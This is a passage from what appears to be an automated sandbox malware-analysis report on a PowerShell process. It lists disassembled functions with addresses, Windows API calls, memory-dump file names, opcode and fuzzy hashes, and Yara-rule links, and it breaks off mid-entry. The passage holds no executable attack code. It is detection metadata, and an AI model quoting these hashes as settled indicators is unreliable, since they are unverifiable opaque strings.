Instruction ID: 0f39aaa79d65ceb928f6d05be86e2f3ab1331c056410dc58f4b6c90ec8c60e41
Opcode Fuzzy Hash: db066d09d7907aea0b165d207a52739069b32f5975c399f481f4e3271ebb8843
Instruction Fuzzy Hash: 03B19F34A00255DFDB15EFA5D944BAEBBB2FF88342F14852DE90AAB390CB749C41CB51

Function 08B34CA8 Relevance: 1.9, Strings: 1, Instructions: 609
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

|S(q, xrefs: 08B3503F

Memory Dump Source

Source File: 0000001C.00000002.2169815315.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8b30000_powershell.jbxd

Similarity

API ID:
String ID: |S(q
API String ID: 0-336117713
Opcode ID: d6b178ebc7a4c7724b535312763a7e7d5b4b7c27d43f83cb6d89ee0a07a13ec4
Instruction ID: 3e35012440ae196935f0645b6efa0c6cd5633319037b676fdf52eb00d6e56204
Opcode Fuzzy Hash: d6b178ebc7a4c7724b535312763a7e7d5b4b7c27d43f83cb6d89ee0a07a13ec4
Instruction Fuzzy Hash: CC420634A00318DFDB28DF64D898BADB7B6FF48305F1585A9E9069B3A1DB75AC41CB40

Function 04C0E531 Relevance: 1.7, APIs: 1, Instructions: 229
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001C.00000002.2134113894.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4c00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e50bcbe9dad3bdf8492504d9d5d93771ba59f2c46f04204928e94c8c6b13869
Instruction ID: 4ff01b4a9af21e18db92495481fc02dc2649ae82a9ff5baf0afffc618a7e9a68
Opcode Fuzzy Hash: 0e50bcbe9dad3bdf8492504d9d5d93771ba59f2c46f04204928e94c8c6b13869
Instruction Fuzzy Hash: 03916D70D40359CFEB24DFA5C844BEEBBF6AF44304F1488AAD509AB290DB755A85CF50

Function 0789F695 Relevance: 1.6, APIs: 1, Instructions: 129
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateNamedPipeW.KERNELBASE(00000000,40080003,?,?,?,00000000,00000001,00000000), ref: 0789F7C0

Memory Dump Source

Source File: 0000001C.00000002.2163479852.0000000007890000.00000040.00000800.00020000.00000000.sdmp, Offset: 07890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7890000_powershell.jbxd

Similarity

API ID: CreateNamedPipe
String ID:
API String ID: 2489174969-0
Opcode ID: 9862d4a60b79efe3ec3213b60cf54c90a0b4e1614d44648040ae0187640e77a3
Instruction ID: c0827db0d5ae6e177aca62dabe65b8cd8f5acd6b0fda5e372b9f99c193d78ec9
Opcode Fuzzy Hash: 9862d4a60b79efe3ec3213b60cf54c90a0b4e1614d44648040ae0187640e77a3
Instruction Fuzzy Hash: FD51F5B1D01349AFDF14CFA9D984B9DBBF2AF48314F288129E508BB261D7749885CF51

Function 04C0E6E4 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IdentifyCodeAuthzLevelW.ADVAPI32(?,?,?,00000000), ref: 04C0E802

Memory Dump Source

Source File: 0000001C.00000002.2134113894.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4c00000_powershell.jbxd

Similarity

API ID: AuthzCodeIdentifyLevel
String ID:
API String ID: 1431151113-0
Opcode ID: b8e79fc4820603e902d2a7d6b63dfe6b82556fa5b1c8e9f91eac937e61d181d5
Instruction ID: 58e16e9aa0d74558a965286ee2a2bebcf2b3ca6fa614276b97f9025fc344530d
Opcode Fuzzy Hash: b8e79fc4820603e902d2a7d6b63dfe6b82556fa5b1c8e9f91eac937e61d181d5
Instruction Fuzzy Hash: 304105B0C01269CFEB64CF59C984BD9BBB5AB48304F1085EAD40DA7250D774AE89CF60

Function 04C0E6F0 Relevance: 1.6, APIs: 1, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IdentifyCodeAuthzLevelW.ADVAPI32(?,?,?,00000000), ref: 04C0E802

Memory Dump Source

Source File: 0000001C.00000002.2134113894.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4c00000_powershell.jbxd

Similarity

API ID: AuthzCodeIdentifyLevel
String ID:
API String ID: 1431151113-0
Opcode ID: 158f30ac37789fa40c34377a5dce90a8b8aee6c617e08b1809b7546587bcccb0
Instruction ID: 94297bb457bd1e462795feafb3875cddbf581f9a9dffcdf93e715bb5b46d7e89
Opcode Fuzzy Hash: 158f30ac37789fa40c34377a5dce90a8b8aee6c617e08b1809b7546587bcccb0
Instruction Fuzzy Hash: 4141E4B0801269CFEB64CF99C984BDDBBB5AB48304F10C5EAD50DB7250D775AA89CF60

Function 08DE5D10 Relevance: 1.6, Strings: 1, Instructions: 342
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

", xrefs: 08DE5DAF

Memory Dump Source

Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 7bc202d6e3181e27e770a01980184fa322262296619c5df8b5d53c0930dd8872
Instruction ID: 3e868f07490a4e6c3ce669f22ff70e927e53906d49a279897a18e7eae8b2c521
Opcode Fuzzy Hash: 7bc202d6e3181e27e770a01980184fa322262296619c5df8b5d53c0930dd8872
Instruction Fuzzy Hash: DEE10934A00209DFDB04DFA4D994BAEB7F6EF88344F2441A9E505AB291DB72AD45CF60

Function 08C92D90 Relevance: 1.6, APIs: 1, Instructions: 62
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadUILanguage.KERNELBASE ref: 08C92E22

Memory Dump Source

Source File: 0000001C.00000002.2172245439.0000000008C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8c90000_powershell.jbxd

Similarity

API ID: LanguageThread
String ID:
API String ID: 243849632-0
Opcode ID: bcae44e20b77ddadc5ce22f8330f81e71862bcd56b3e79763cc1a1fed5af3a8e
Instruction ID: 6224fc6067c88604b1d3096f24b13598be8e8a36ac172b57ca06e547af67b7a8
Opcode Fuzzy Hash: bcae44e20b77ddadc5ce22f8330f81e71862bcd56b3e79763cc1a1fed5af3a8e
Instruction Fuzzy Hash: D01176B58043888FDB50CF99C588BEEBFF4EB18321F15849AD498A7350C378A945CFA5

Function 04C06E80 Relevance: 1.6, APIs: 1, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(00000000), ref: 04C06EF8

Memory Dump Source

Source File: 0000001C.00000002.2134113894.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4c00000_powershell.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 9f56635415284d5817f096c43b5637fe502fd9c61a75cd5d95a17749c623ec43
Instruction ID: 4650aaf5aa123d7274d765912b25571056bd45c0c8c0cc7fe37f3022df834a85
Opcode Fuzzy Hash: 9f56635415284d5817f096c43b5637fe502fd9c61a75cd5d95a17749c623ec43
Instruction Fuzzy Hash: 942136B1D0439A9BDB10CFAAD44479EFBF4EB48324F14816AD818B7240C774AA55CFA5

Function 04C047EC Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(00000000), ref: 04C06EF8

Memory Dump Source

Source File: 0000001C.00000002.2134113894.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4c00000_powershell.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5ba8ca3e397a8a5076b0b68debb34c4a42e207b7ab709e8d5d023818cc0ef15c
Instruction ID: e0664072754cc90c188798b333f76b719780e5fd972d3e785e70788a699018f9
Opcode Fuzzy Hash: 5ba8ca3e397a8a5076b0b68debb34c4a42e207b7ab709e8d5d023818cc0ef15c
Instruction Fuzzy Hash: 112130B1E047599BDB10CF9AD844B9EFBF4EB48324F10812AD828B7240D374AA54CFA5

Function 08C90AF8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

SetThreadUILanguage.KERNELBASE ref: 08C92E22

Memory Dump Source

Source File: 0000001C.00000002.2172245439.0000000008C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8c90000_powershell.jbxd

Similarity

API ID: LanguageThread
String ID:
API String ID: 243849632-0
Opcode ID: 952c3125b2238b911a8a34db2cc33a9b163f2f12ea562c3ee66f182829b1c19a
Instruction ID: 78b32890211e1e87bd624c1134dee8108ae468467ad08d8fc5ca9609b2b92b01
Opcode Fuzzy Hash: 952c3125b2238b911a8a34db2cc33a9b163f2f12ea562c3ee66f182829b1c19a
Instruction Fuzzy Hash: 60113AB18047489FDB10DF9AD4847EEBBF4EB48315F10845AD598A7310C774A944CFA4

Function 08DE1832 Relevance: 1.5, Strings: 1, Instructions: 219COMMON

Download Yara Rule

Strings

#, xrefs: 08DE1908

Memory Dump Source

Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 7ea8ad283927f5313da7b5c04412289a2ff1be5b3d3706b8acbcf41699177b01
Instruction ID: fdc80c9beb725056740f6095ef34b317f798055245ff4b899d4e6e9a29905daf
Opcode Fuzzy Hash: 7ea8ad283927f5313da7b5c04412289a2ff1be5b3d3706b8acbcf41699177b01
Instruction Fuzzy Hash: 3E911E34A00219CFDF24EF65C984BADB7B6AF48343F1486ADE859AB254DB3499C1CF50

Function 08D15CB4 Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

}/,c, xrefs: 08D15CB4

Memory Dump Source

Source File: 0000001C.00000002.2172791888.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8d10000_powershell.jbxd

Similarity

API ID:
String ID: }/,c
API String ID: 0-963269455
Opcode ID: c841230a7e0179cae00401ed5fe553bb661956972b3ca2906fb854f449c18052
Instruction ID: fa4832398f9f1f97845a49695caa6e5ba282b390535637790e100859d7234efc
Opcode Fuzzy Hash: c841230a7e0179cae00401ed5fe553bb661956972b3ca2906fb854f449c18052
Instruction Fuzzy Hash: 7421F2B5900349AFCF10CF9AD884BDEBBF4FF48310F10852AE919A7250D374A954CBA4

Function 08881798 Relevance: .8, Instructions: 831COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2167324382.0000000008880000.00000040.00000800.00020000.00000000.sdmp, Offset: 08880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8880000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdab9aaf1a1e1e3a95a775c6f5b8349233cb44b220c1b6ba7c45b9422b829042
Instruction ID: 47c722c68727f4a712740e1075033fdbcdcaf728d9d4760d8b2e9be50912cacf
Opcode Fuzzy Hash: cdab9aaf1a1e1e3a95a775c6f5b8349233cb44b220c1b6ba7c45b9422b829042
Instruction Fuzzy Hash: 7F524639B04348DFCB25AB68D80876ABBE2AFC5212F1480AED545DB652DF35DC43C7A1

Function 087E6D78 Relevance: .6, Instructions: 552COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2166948372.00000000087E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_87e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cec97cb503cec87a0cd61404c79d2a73b120c18dc1b0028d4a4fdc7213f4b1c
Instruction ID: 8c0d9bd52ed7126ffddbb95662b068dd3045bf73445f4d7e4e002d55bcf16698
Opcode Fuzzy Hash: 0cec97cb503cec87a0cd61404c79d2a73b120c18dc1b0028d4a4fdc7213f4b1c
Instruction Fuzzy Hash: B8327C34A002498FDB14DF94C444BAEB7B2FF88302F25C569E115AF2A9CB74DD85CBA1

Function 08DE7568 Relevance: .5, Instructions: 483COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bfe62887f1a2d1ba6dc23a02138a206fddd91928c505a1361efc3d1d8c78866
Instruction ID: b563f21f33bcbfa43b7ca691f75da8b43a7503bacf0d29ea1eb4d7d4b2790c25
Opcode Fuzzy Hash: 1bfe62887f1a2d1ba6dc23a02138a206fddd91928c505a1361efc3d1d8c78866
Instruction Fuzzy Hash: 94123734A00204CFDB54EFA8D584A9DB7F2FF88351F1586A9E905AB361CB74ED46CB90

Function 08B3C888 Relevance: .5, Instructions: 476COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2169815315.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8b30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dc4522bb77f6c07427583aa637c1de74c06e6372bd71beb7b48f9b463fb7127
Instruction ID: 7bfa224f9c41fa3452780344c0fca7316cc229dbd1e7163c3f5712562e5633fd
Opcode Fuzzy Hash: 2dc4522bb77f6c07427583aa637c1de74c06e6372bd71beb7b48f9b463fb7127
Instruction Fuzzy Hash: 06123934A00228DFDB14DFA8D464AAEBBF2FF88311F118569D406AB350DB75ED45CB91

Function 08B58EA0 Relevance: .4, Instructions: 413COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2170083500.0000000008B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8b50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c446984664e743ba7f2afc9f475971655531635d8c4490f3c7eac080d5263a57
Instruction ID: 73f7ccb17fb1bc4bf210a9a662d015886aa27617be8e9a45a423f7fc7a71c0b9
Opcode Fuzzy Hash: c446984664e743ba7f2afc9f475971655531635d8c4490f3c7eac080d5263a57
Instruction Fuzzy Hash: 4DE19E34B00204DFDB149F68E854BAEBBE6EF88351F1980A9D916DB391DB75CD41CB90

Function 08B5A021 Relevance: .4, Instructions: 408COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2170083500.0000000008B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8b50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07afae6bcc375542630330af9401b85be90c714937f35f97a7d97e4bfa27d652
Instruction ID: bee6a6f691bb65e8f7d79a9f3dcd1c0360e7688980139c7756702c9946433640
Opcode Fuzzy Hash: 07afae6bcc375542630330af9401b85be90c714937f35f97a7d97e4bfa27d652
Instruction Fuzzy Hash: 3602C734A00219CFDB14DFA4D894A9DBBB6FF89302F259169D81AAB361DB35EC41CF50

Function 08B5AE90 Relevance: .3, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2170083500.0000000008B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8b50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b7bfa529da3c264dac0931d9a8fb9a555fe50e9b7573c302b3d7f1f2182402e
Instruction ID: 1f65229559098948a78f7631f3e1e683a12c812428576460ff6586ff3c28f501
Opcode Fuzzy Hash: 7b7bfa529da3c264dac0931d9a8fb9a555fe50e9b7573c302b3d7f1f2182402e
Instruction Fuzzy Hash: 6EC1F331E007099FDB11DF64C850BAEBBB2EF85311F1486A9D915AB390DB31AD46CBA0

Function 08DDD138 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2174534655.0000000008DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8dd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b138bbbfdf0170ffa452cac40132b47a3b648c015483fca0e45ebc410b774ea
Instruction ID: 5ee1d4395d9585b080fc3f8cd77fe70815e71d5fe8112cf2aba54f73bac7ad66
Opcode Fuzzy Hash: 4b138bbbfdf0170ffa452cac40132b47a3b648c015483fca0e45ebc410b774ea
Instruction Fuzzy Hash: BBD13934A013049FDB15DFA4D494BAEBBB3EF84341F24852CE506AB3A1CB75E945CB90

Function 08DDB508 Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2174534655.0000000008DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8dd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc8c568bc7933f1eba6d2da1afe2effa81525bca975235726e20c8511194e9e7
Instruction ID: ff4db1f740fcf665491461885b55f6e5aad2e80019ddcfeae939d92e3f4529c2
Opcode Fuzzy Hash: fc8c568bc7933f1eba6d2da1afe2effa81525bca975235726e20c8511194e9e7
Instruction Fuzzy Hash: D8D16F74A01345DFDB04DF68D590A5DBBB2FF88365F1686A9E4059B361DB30EC82CB90

Function 08D11C28 Relevance: .3, Instructions: 319COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2172791888.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8d10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b716d3b645bdb35136c4586afe861ec41db4e4ceed9a76ec8e745eeef44bacd3
Instruction ID: b73349d55f9b576e8d6f95922ce7ae179d7d90c93847d5c963b2e67066b852ff
Opcode Fuzzy Hash: b716d3b645bdb35136c4586afe861ec41db4e4ceed9a76ec8e745eeef44bacd3
Instruction Fuzzy Hash: 13C19D35B00218DFCB14DBA8E844AAEB7B2FF88351F14862DE5469B355DB35EC41CB90

Function 08DE6408 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94b41ccec68240a420144185eaa649723a9fcaf89b9536b99d342be36c41b461
Instruction ID: 5c1184ac2a4ee56cf83a38f29897b2d3848b13bd05d637dceeea9943bf92fdd1
Opcode Fuzzy Hash: 94b41ccec68240a420144185eaa649723a9fcaf89b9536b99d342be36c41b461
Instruction Fuzzy Hash: 69D1FC74A002158FCB15DF65D58499D7BF2BF9C361F1552A8E805AB3A6DB30EC81CF50

Function 08DE49E0 Relevance: .3, Instructions: 304COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d307a63dc61993acb30cd908ff03ad4ab5fa0a330351697162bc609e98b08478
Instruction ID: 71c8d3604c35bfb0bc3575e9992badf9c4bcebce06e022ac726fe4bb4f307a5a
Opcode Fuzzy Hash: d307a63dc61993acb30cd908ff03ad4ab5fa0a330351697162bc609e98b08478
Instruction Fuzzy Hash: D6C16D74B002089FDB14EFA4C894BAEBBB6EF88311F10416DE9069B391DB75EC42CB54

Function 08B35588 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2169815315.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8b30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c1c088e4487695649e91eaec9bcf02d0a65eacfb6d6339b0f6d054a30dba711
Instruction ID: 365e00991834f76ee6e7a8aad1406ccdbeb84e17b93df5e9baa2371321b664b7
Opcode Fuzzy Hash: 0c1c088e4487695649e91eaec9bcf02d0a65eacfb6d6339b0f6d054a30dba711
Instruction Fuzzy Hash: 68D11874A01219CFDB24CF94C688B99BBB2FF48316F5191A8D406AF366D778ED49CB40

Function 08D1F1B8 Relevance: .3, Instructions: 286COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2172791888.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8d10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d18ad5c8b0bec58343469ae20427504621914368c92b0ffa66d7fdcb381e9049
Instruction ID: e3a0b35f0898eea2320365d1ffe97cc2a77571d81ea96a98e32ff50ec65ccf77
Opcode Fuzzy Hash: d18ad5c8b0bec58343469ae20427504621914368c92b0ffa66d7fdcb381e9049
Instruction Fuzzy Hash: 9BC167706007469FCB20DF69E980AAEB7F2FF88301B10862CD4469B755DB70E946CBA1

Function 08DC8ED8 Relevance: .3, Instructions: 286COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2174381658.0000000008DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8dc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 947f05ef8f99f90e9e14c538e61cc2930336eb4629a836bb729e79ff01d9aba6
Instruction ID: 547f497479035bee98752749785900570bd8820588f0f800306859dac608aaa2
Opcode Fuzzy Hash: 947f05ef8f99f90e9e14c538e61cc2930336eb4629a836bb729e79ff01d9aba6
Instruction Fuzzy Hash: 8CA1EE34B003059FEB15EB78D854BADBBB2EF89341F10856DDA02AB390DB75D881DB50

Function 08DE70D8 Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbd0f6656c0489abee06f41c639491b023b0804ba33c323a808e81f90b36d71e
Instruction ID: 8626f4e856ee4394234c0f32011dfe3121dd56f20328a51bec82477ef2cc333a
Opcode Fuzzy Hash: dbd0f6656c0489abee06f41c639491b023b0804ba33c323a808e81f90b36d71e
Instruction Fuzzy Hash: C0B18B34B00605DFDB05DBB8D854AAEBBF6FF88341F14852DE94AAB391DB749801CB61

Function 08DECCE0 Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38f58c591b8a76794b7e3982750cb42077a9d18e75a22212fc052fbda0d07b99
Instruction ID: 928ff59c43c0ed54ba247981ae7da0e41e7b5803f7bb93c7bb4188b6bf4c630c
Opcode Fuzzy Hash: 38f58c591b8a76794b7e3982750cb42077a9d18e75a22212fc052fbda0d07b99
Instruction Fuzzy Hash: F4C17C74A10345DFDB15EF68C884A9EBBB2FF88341F148669E5099B351DB70EC46CB60

Function 08B57A60 Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2170083500.0000000008B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8b50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e12248d61f2091b580a4d5aabb7dc5fb89749aec9dc8d6bcae2ab06622e9666
Instruction ID: 789f44e6deb86c1db078475b0c764ea00a6d3a683500960308a71104faf709eb
Opcode Fuzzy Hash: 1e12248d61f2091b580a4d5aabb7dc5fb89749aec9dc8d6bcae2ab06622e9666
Instruction Fuzzy Hash: E6A16A30B00609CFDB18DF69D894BAEB7B6EF88301F10856DE916AB294DF759C45CB90

Function 08D18A88 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2172791888.0000000008D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8d10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 421035dec84d56a815e199db38ad2b798feb037e56fd77942c03405045b48e64
Instruction ID: e02e9edff2dccd6b90e5d62eeb67e46b6541c062a23ce210f5dcc98c23b93e6d
Opcode Fuzzy Hash: 421035dec84d56a815e199db38ad2b798feb037e56fd77942c03405045b48e64
Instruction Fuzzy Hash: EB91EF34B00345AFEB14EB79E8947AEBAE6EF84341F14453DD609EB380DFB598458B60

Function 08D630E0 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2173429287.0000000008D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8d60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5e569ed8d450c3750fc2998329ab6c1f7810c0391cd7e0ff2e7949f2ecc4127
Instruction ID: 266776137cbfa4e2a3563ea1a033baabd865209a8458ff9ee57615a8b697d00a
Opcode Fuzzy Hash: d5e569ed8d450c3750fc2998329ab6c1f7810c0391cd7e0ff2e7949f2ecc4127
Instruction Fuzzy Hash: FC910334B002588FCB2CDFB9D84462E77B6AFC92A1B1886ADD546CB351DB34DC11CB61

Function 087EEFD0 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2166948372.00000000087E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_87e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 547be203bd2934d48a928f44e020c2e86d09ba29799df753a305b6c916217da7
Instruction ID: f054b65e137f0dc7d5fa5ab5a51a6f9929a7100f95aee143fc89c1106f500059
Opcode Fuzzy Hash: 547be203bd2934d48a928f44e020c2e86d09ba29799df753a305b6c916217da7
Instruction Fuzzy Hash: 50A18B342007458FD704EB74D890A5EB7A2FFC4290F158A78D2468F6A5DFB0ED4ACB91

Function 08DD1880 Relevance: .3, Instructions: 262COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2174534655.0000000008DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8dd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80b87136972a61ecc5b6770cebe1b7f39102b9688e3eb9fbf7305e20dd6320f7
Instruction ID: 3305e2a711ab54e03c9dc086430b26c8c334c19411caae0d7c644987bea63ae1
Opcode Fuzzy Hash: 80b87136972a61ecc5b6770cebe1b7f39102b9688e3eb9fbf7305e20dd6320f7
Instruction Fuzzy Hash: 39B14678A012189FCB14CFA9D580AADFBF2FF88350F158299E855AB361D770ED45CB90

Function 08DE2560 Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2174700822.0000000008DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_8de0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 284c01ef82ae6b82ed009c3f36b09915be0dd79c0cd28d1ad6d4cb823763c7d4
Instruction ID: 6ee1ebf6e9e8838aeba06cf7933c4aaced180dec8a782a39221910453ba0f388
Opcode Fuzzy Hash: 284c01ef82ae6b82ed009c3f36b09915be0dd79c0cd28d1ad6d4cb823763c7d4
